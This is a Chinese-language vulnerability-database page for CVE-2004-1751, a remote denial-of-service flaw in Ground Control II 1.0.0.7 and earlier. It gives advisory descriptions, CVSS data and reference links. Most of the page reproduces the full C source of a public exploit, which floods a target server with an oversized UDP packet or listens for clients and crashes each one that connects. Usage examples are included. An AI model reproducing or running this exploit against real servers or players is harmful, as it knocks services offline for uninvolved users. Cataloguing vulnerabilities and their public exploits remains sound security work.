CVE-2004-1751
CVSS5.0
发布时间 :2004-08-26 00:00:00
修订时间 :2016-10-17 23:00:27
NMCOE    

[原文]Ground Control II: Operation Exodus 1.0.0.7 and earlier allows remote servers to cause a denial of service (client or server crash) via a large packet, which generates a "Message too long" socket error that is treated as a critical error.


[CNNVD]Massive Entertainment Ground Control II远程服务拒绝漏洞(CNNVD-200408-223)

        Ground Control II: Operation Exodus 1.0.0.7及其早期版本存在漏洞。远程服务器借助超大数据包导致服务拒绝(客户端或者服务器崩溃),该漏洞产生被看做是关键性错误的“消息太长”接口错误。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1751
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1751
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-223
(官方数据源) CNNVD

- 其它链接及资源

http://aluigi.altervista.org/adv/gc2boom-adv.txt
(VENDOR_ADVISORY)  MISC  http://aluigi.altervista.org/adv/gc2boom-adv.txt
http://marc.info/?l=bugtraq&m=109357154602892&w=2
(UNKNOWN)  BUGTRAQ  20040826 Broadcast forced exit in Ground Control II 1.0.0.7
http://securitytracker.com/id?1011075
(VENDOR_ADVISORY)  SECTRACK  1011075
http://www.securityfocus.com/bid/11058
(VENDOR_ADVISORY)  BID  11058
http://xforce.iss.net/xforce/xfdb/17130
(VENDOR_ADVISORY)  XF  ground-control-dos(17130)

- 漏洞信息

Massive Entertainment Ground Control II远程服务拒绝漏洞
中危 其他
2004-08-26 00:00:00 2005-10-20 00:00:00
远程  
        Ground Control II: Operation Exodus 1.0.0.7及其早期版本存在漏洞。远程服务器借助超大数据包导致服务拒绝(客户端或者服务器崩溃),该漏洞产生被看做是关键性错误的“消息太长”接口错误。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (429)

Ground Control <= 1.0.0.7 (Server/Client) Denial of Service Exploit (EDBID:429)
windows dos
2004-08-31 Verified
0 Luigi Auriemma
N/A [点击下载]
/*
by Luigi Auriemma
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
 #include <winsock.h>
 #include "winerr.h"

 #define close closesocket
 #define ONESEC 1000
#else
 #include <unistd.h>
 #include <sys/socket.h>
 #include <sys/types.h>
 #include <arpa/inet.h>
 #include <netdb.h>

 #define ONESEC 1
#endif

#define VER "0.1"
#define PORT 42001
#define BUFFSZ 2048
#define BOOMSZ 1024 // 513 is enough
#define TIMEOUT 3
#define INFO "\x58\x00\x00\x00" /* build */ \
       "\x52\x00" /* protocol */ \
       "\x0a\x00\x00" /* gameinfo */
       /* this packet is not important, you can also use random data */

void show_gc2info(u_char *data, int len);
void unicode2char(u_char *data, int len);
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
 struct sockaddr_in peer;
 int sd,
     len,
     psz,
     on = 1,
     type,
     doubt = 0;
 u_short port = PORT;
 u_char buff[BUFFSZ];

 setbuf(stdout, NULL);

 fputs("\n"
   "Ground Control <= 1.0.0.7 server/client crash "VER"\n"
   "by Luigi Auriemma\n"
   "e-mail: aluigi@altervista.org\n"
   "web: http://aluigi.altervista.org\n"
   "\n", stdout);

 if(argc < 2) {
   printf("\nUsage: %s <attack> [port(%d)]\n"
     "\n"
     "Attack:\n"
     " c = broadcast clients crash\n"
     " s = server crash (can be also directly used versus a client)\n"
     " You must add the IP or the hostname of the server after the 
's'.\n"
     "\n"
     "Some usage examples:\n"
     " gc2boom c listens on port %d for clients\n"
     " gc2boom c 1234 listens on port 1234\n"
     " gc2boom s 192.168.0.1 tests the server 192.168.0.1 on port %d\n"
     " gc2boom s codserver 1234 tests the server codserver on port 
1234\n"
     "\n", argv[0], PORT, PORT, PORT);
   exit(1);
 }

#ifdef WIN32
 WSADATA wsadata;
 WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

 type = argv[1][0];
 if(type == 's') {
   if(!argv[2]) {
     fputs("\n"
       "Error: you must specify the server IP or hostname.\n"
       " Example: gc2boom s localhost\n"
       "\n", stdout);
     exit(1);
   }
   peer.sin_addr.s_addr = resolv(argv[2]);
   if(argc > 3) port = atoi(argv[3]);
   printf("\n- Target %s:%hu\n\n",
     inet_ntoa(peer.sin_addr),
     port);
 } else if(type == 'c') {
   peer.sin_addr.s_addr = INADDR_ANY;
   if(argc > 2) port = atoi(argv[2]);
   printf("\n- Listening on port %d\n", port);
 } else {
   fputs("\n"
     "Error: Wrong type of attack.\n"
     " You can choose between 2 types of attacks, versus clients with 'c' 
or\n"
     " versus servers with 's'\n"
     "\n", stdout);
   exit(1);
 }

 peer.sin_port = htons(port);
 peer.sin_family = AF_INET;
 psz = sizeof(peer);

 sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
 if(sd < 0) std_err();

 if(type == 's') {
   fputs("- Request informations\n", stdout);
   if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, 
sizeof(peer))
    < 0) std_err();
   if(timeout(sd) < 0) {
     fputs("\n"
       "Alert: socket timeout, probably the server is not online or the 
port you have\n"
       " choosen is not exact.\n"
       " Check the \"unreliableport\" value in the server's 
informations.\n"
       " This tool now continue the attack\n", stdout);
       doubt = 1;
   } else {
     len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
     if(len < 0) std_err();
     show_gc2info(buff, len);
   }

   memset(buff, 0x00, BOOMSZ);
   fputs("- Send BOOM packet\n", stdout);
   if(sendto(sd, buff, BOOMSZ, 0, (struct sockaddr *)&peer, sizeof(peer))
    < 0) std_err();

   fputs("- Wait one second for an exact check\n", stdout);
   sleep(ONESEC);

   fputs("- Check if server is vulnerable\n", stdout);
   if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, 
sizeof(peer))
    < 0) std_err();
   if(doubt) {
     fputs("\nI can't say if the host is vulnerable, check it 
manually\n\n", stdout);
   } else {
     if(timeout(sd) < 0) {
       fputs("\nServer IS vulnerable!!!\n\n", stdout);
     } else {
       fputs("\nServer doesn't seem vulnerable\n\n", stdout);
     }
   }
 } else {
   if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
    < 0) std_err();
   if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))
    < 0) std_err();
   fputs("Clients:\n", stdout);
   while(1) {
     len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
     if(len < 0) std_err();
     buff[len] = 0x00;

     printf("%16s:%hu -> %s\n",
       inet_ntoa(peer.sin_addr),
       ntohs(peer.sin_port),
       buff);

     memset(buff, 0x00, BOOMSZ);
     if(sendto(sd, buff, BOOMSZ, 0, (struct sockaddr *)&peer, 
sizeof(peer))
      < 0) std_err();
   }
 }

 close(sd);
 return(0);
}

void show_gc2info(u_char *data, int len) {
 u_char *ptr;
 int cp;

 printf("\n Build: %d", *(u_short *)data);
 printf("\n Protocol: %d", *(u_short *)(data + 4));
 printf("\n Gameinfo: %d", *(u_short *)(data + 6));
 ptr = data + 9;
 fputs("\n Server name: ", stdout);
 unicode2char(ptr + 1, *ptr);
 fwrite(ptr + 1, 1, *ptr, stdout);
 ptr += (*ptr << 1) + 1;
 fputs("\n Map: ", stdout);
 ptr += fwrite(ptr + 1, 1, *ptr, stdout) + 1;
 fputs("\n External IP: ", stdout);
 ptr += fwrite(ptr + 1, 1, *ptr, stdout) + 1;
 ptr += 4;
 cp = *ptr++;
 printf("\n Current players: %d", cp);
 printf("\n Max players: %d", *ptr++);
 printf("\n ???: %s", *ptr++ ? "true" : "false");
 printf("\n Dedicated: %s", *ptr++ ? "true" : "false");
 printf("\n Password: %s", *ptr++ ? "true" : "false");
 ptr += 5;
 while(cp--) {
   fputs("\n Player: ", stdout);
   unicode2char(ptr + 1, *ptr);
   fwrite(ptr + 1, 1, *ptr, stdout);
   ptr += (*ptr << 1) + 1 + 6;
 }
 fputs("\n\n", stdout);
}

void unicode2char(u_char *data, int len) {
 u_char *out = data;

 while(len--) {
   *out++ = *data++;
   data++;
 }
}

int timeout(int sock) {
 struct timeval tout;
 fd_set fd_read;
 int err;

 tout.tv_sec = TIMEOUT;
 tout.tv_usec = 0;
 FD_ZERO(&fd_read);
 FD_SET(sock, &fd_read);
 err = select(sock + 1, &fd_read, NULL, NULL, &tout);
 if(err < 0) std_err();
 if(!err) return(-1);
 return(0);
}

u_long resolv(char *host) {
 struct hostent *hp;
 u_long host_ip;

 host_ip = inet_addr(host);
 if(host_ip == INADDR_NONE) {
   hp = gethostbyname(host);
   if(!hp) {
     printf("\nError: Unable to resolve hostname (%s)\n", host);
     exit(1);
   } else host_ip = *(u_long *)(hp->h_addr);
 }
 return(host_ip);
}

#ifndef WIN32
 void std_err(void) {
   perror("\nError");
   exit(1);
 }
#endif

// milw0rm.com [2004-08-31]
		

- 漏洞信息

9272
Ground Control II Client/Server Large Packet DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

GroundControl contains a flaw that may allow a remote denial of service. The issue is triggered when the client or server receives a packet bigger than 512 bytes, and will result in loss of availability for the GroundControl server.

- 时间线

2004-08-26 Unknow
2004-08-26 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Luigi Auriemma has released an unofficial patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站